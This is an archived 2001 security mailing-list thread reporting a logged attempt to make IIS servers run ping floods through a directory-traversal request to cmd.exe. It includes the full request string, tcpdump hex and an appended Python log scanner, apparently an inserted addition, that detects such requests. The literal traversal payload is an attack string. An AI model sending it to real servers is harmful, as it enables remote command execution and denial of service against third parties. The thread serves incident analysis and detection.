Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool

From: Blake Frantz (blakeat_private)
Date: Tue Aug 07 2001 - 16:32:54 PDT


    This attack appears to be more related to MS01-026 than Code Red.
    
    -Blake
    
    On Tue, 7 Aug 2001, Eyes to the Skies. wrote:
    
    > Okay this is scary.
    > 
    > This looks like an attempt to use a CodeRed II infected system to
    > perform a denial of service attack. I don't think I need to stress the
    > severity of this.
    > 
    > ==> /var/log/apache/access_log <==
    > [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET
    > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted
    > target ip]+"-n"+7000+"-w"+0" 404 -
    > 
    > TCPDUMP: (I have only removed the source, since editing out the target
    > ip would bork the dump...)
    > 
    > 17:19:34.539092 xxx.xxx.xxx.3385 > tnt1a-31.flint.corecomm.net.ww
    > w: P [bad tcp cksum 6ca7!] 792933628:792933745(117) ack 3456715952 win
    > 16616 (DF
    > ) (ttl 110, id 7881, len 157)
    > 0x0000   4500 009d 1ec9 4000 6e06 f3dd d519 f9a4        E.....@.n.......
    > 0x0010   d8d6 521f 0d39 0050 2f43 34fc ce09 4cb0        ..R..9.P/C4...L.
    > 0x0020   5018 40e8 4446 0000 4745 5420 2f73 6372        P.@.DF..GET./scr
    > 0x0030   6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f        ipts/..../winnt/
    > 0x0040   7379 7374 656d 3332 2f63 6d64 2e65 7865        system32/cmd.exe
    > 0x0050   3f2f 632b 7069 6e67 2e65 7865 2b22 2d76        ?/c+ping.exe+"-v
    > 0x0060   222b 6967 6d70 2b22 2d74 222b 222d 6c22        "+igmp+"-t"+"-l"
    > 0x0070   2b36 3530 3030 2b32 3133 2e32 352e 3933        +65000+213.25.93
    > 0x0080   2e31 3230 2b22 2d6e 222b 3730 3030 2b22        .120+"-n"+7000+"
    > 0x0090   2d77 222b 300d 0a0d 0a2b 300d 0a               -w"+0....+0..
    > 17:19:34.539626 unknown ip 0
    > 0x0000   0000 0000 4510 009d 0000 0000 ff06 c196        ....E...........
    > 0x0010   d519 f9a4 d8d6 521f 0d39 0050 fc34 432f        ......R..9.P.4C/
    > 0x0020   fc34 432f 5018 0860 7cff 0000 4745 5420        .4C/P..`|...GET.
    > 0x0030   2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769        /scripts/..../wi
    > 0x0040   6e6e 742f 7379 7374 656d 3332 2f63 6d64        nnt/system32/cmd
    > 0x0050   2e65 7865 3f2f 632b 7069 6e67 2e65 7865        .exe?/c+ping.exe
    > 0x0060   2b22 2d76 222b 6967 6d70 2b22 2d74 222b        +"-v"+igmp+"-t"+
    > 0x0070   222d 6c22 2b36 3530 3030 2b32 3133 2e32        "-l"+65000+213.2
    > 0x0080   352e 3933 2e31 3230 2b22 2d6e 222b 3730        5.93.120+"-n"+70
    > 0x0090   3030 2b22 2d77 222b 300d 0a0d 0a2b 300d        00+"-w"+0....+0.
    > 0x00a0   0a                                             .
    > 
    > 17:20:13.919075 xxx.xxx.xxx.xxx.4229 > tnt1a-31.flint.corecomm.net.ww
    > w: P [bad tcp cksum 6ca7!] 841644777:841644894(117) ack 3492756124 win
    > 16616 (DF
    > ) (ttl 110, id 11022, len 157)
    > 0x0000   4500 009d 2b0e 4000 6e06 e798 d519 f9a4        E...+.@.n.......
    > 0x0010   d8d6 521f 1085 0050 322a 7ae9 d02f 3a9c        ..R....P2*z../:.
    > 0x0020   5018 40e8 0814 0000 4745 5420 2f73 6372        P.@.....GET./scr
    > 0x0030   6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f        ipts/..../winnt/
    > 0x0040   7379 7374 656d 3332 2f63 6d64 2e65 7865        system32/cmd.exe
    > 0x0050   3f2f 632b 7069 6e67 2e65 7865 2b22 2d76        ?/c+ping.exe+"-v
    > 0x0060   222b 6967 6d70 2b22 2d74 222b 222d 6c22        "+igmp+"-t"+"-l"
    > 0x0070   2b36 3530 3030 2b32 3133 2e32 352e 3933        +65000+213.25.93
    > 0x0080   2e31 3230 2b22 2d6e 222b 3730 3030 2b22        .120+"-n"+7000+"
    > 0x0090   2d77 222b 300d 0a0d 0a2b 300d 0a               -w"+0....+0..
    > 
    > 17:20:13.919639 unknown ip 0
    > 0x0000   0000 0000 4510 009d 0000 0000 ff06 0000        ....E...........
    > 0x0010   d519 f9a4 d8d6 521f 1085 0050 e97a 2a32        ......R....P.z*2
    > 0x0020   e97a 2a32 5018 0860 5422 0000 4745 5420        .z*2P..`T"..GET.
    > 0x0030   2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769        /scripts/..../wi
    > 0x0040   6e6e 742f 7379 7374 656d 3332 2f63 6d64        nnt/system32/cmd
    > 0x0050   2e65 7865 3f2f 632b 7069 6e67 2e65 7865        .exe?/c+ping.exe
    > 0x0060   2b22 2d76 222b 6967 6d70 2b22 2d74 222b        +"-v"+igmp+"-t"+
    > 0x0070   222d 6c22 2b36 3530 3030 2b32 3133 2e32        "-l"+65000+213.2
    > 0x0080   352e 3933 2e31 3230 2b22 2d6e 222b 3730        5.93.120+"-n"+70
    > 0x0090   3030 2b22 2d77 222b 300d 0a0d 0a2b 300d        00+"-w"+0....+0.
    > 0x00a0   0a                                             .
    > 
    > 
    > As an afterthought, I saw a URL drifting around, related to such an
    > idea. http://www.iispacket.com/ , although I am not getting that host to
    > respond.
    > 
    > I think this needs immediate attention. I can't do it now, I must go to
    > school.
    > -- 
    > 
    >  http://c64.arcsnet.net/
    >  ICQ UIN 1551505
    >  "The things you own, they end up owning you." - Tyler Durden
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management 
    > and tracking system please see: http://aris.securityfocus.com
    > 
    > 
    
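As an added example for readers of this thread (not code from either poster or from the ARIS list), here is a small Python scanner for Apache access_log lines of the kind quoted above. It decodes the request path the way a permissive server would (the overlong UTF-8 sequence %c1%9c that stands for a backslash, and, going beyond the post, the double-encoded %255c form associated with MS01-026), flags requests that traverse to cmd.exe, and splits out the argument list so the ping parameters (-l size, -n count) can be read off and the intended traffic volume estimated. The sample log lines, client hosts and ping target address are constructed placeholders, not values from the page.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access_log lines modelled on the entry quoted in the post;
# client hosts and the ping target are placeholder addresses, not page values.
SAMPLE_LOG = r'''
203.0.113.7 - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+192.0.2.10+"-n"+7000+"-w"+0" 404 -
203.0.113.8 - - [07/Aug/2001:17:19:36 -0400] "GET /index.html HTTP/1.0" 200 1234
203.0.113.9 - - [07/Aug/2001:17:19:37 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
'''

LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>.*?)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) ')

def lax_utf8_decode(data: bytes) -> str:
    """Decode like a permissive server: accept overlong 2-byte forms such as
    C1 9C (which strict UTF-8 rejects), so '..%c1%9c..' turns into '..\\..'.
    Every other byte passes through unchanged."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return ''.join(out)

def normalise_path(raw: str) -> str:
    """Two decode rounds model a superfluous second decode (%255c -> %5c -> '\\');
    backslashes are folded to '/' so traversal is visible either way."""
    for _ in range(2):
        raw = lax_utf8_decode(unquote_to_bytes(raw))
    return raw.replace('\\', '/')

def analyse(line: str):
    """Return a finding dict for a traversal-to-cmd.exe request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m['target'].partition('?')
    norm = normalise_path(path)
    if '/../' not in norm and not norm.lower().endswith('cmd.exe'):
        return None
    argv = [a.strip('"') for a in query.split('+') if a]   # '+' separates cmd.exe args
    return {'host': m['host'], 'status': int(m['status']), 'decoded_path': norm, 'argv': argv}

def icmp_payload_bytes(argv: list) -> int:
    """ICMP payload bytes a 'ping -l SIZE -n COUNT' would emit (ignores -t); 0 if not ping."""
    if 'ping.exe' not in [a.lower() for a in argv]:
        return 0
    opts = {argv[i]: argv[i + 1] for i in range(len(argv) - 1) if argv[i].startswith('-')}
    return int(opts.get('-l', 32)) * int(opts.get('-n', 4))

def scan(log_text: str) -> list:
    return [f for f in map(analyse, log_text.strip().splitlines()) if f]
```

A 404 in the sample means the request hit a web server that does not serve cmd.exe; the same line against an unpatched IIS host would have executed the ping, which is what makes the pattern worth alerting on regardless of status.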



    This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 17:30:14 PDT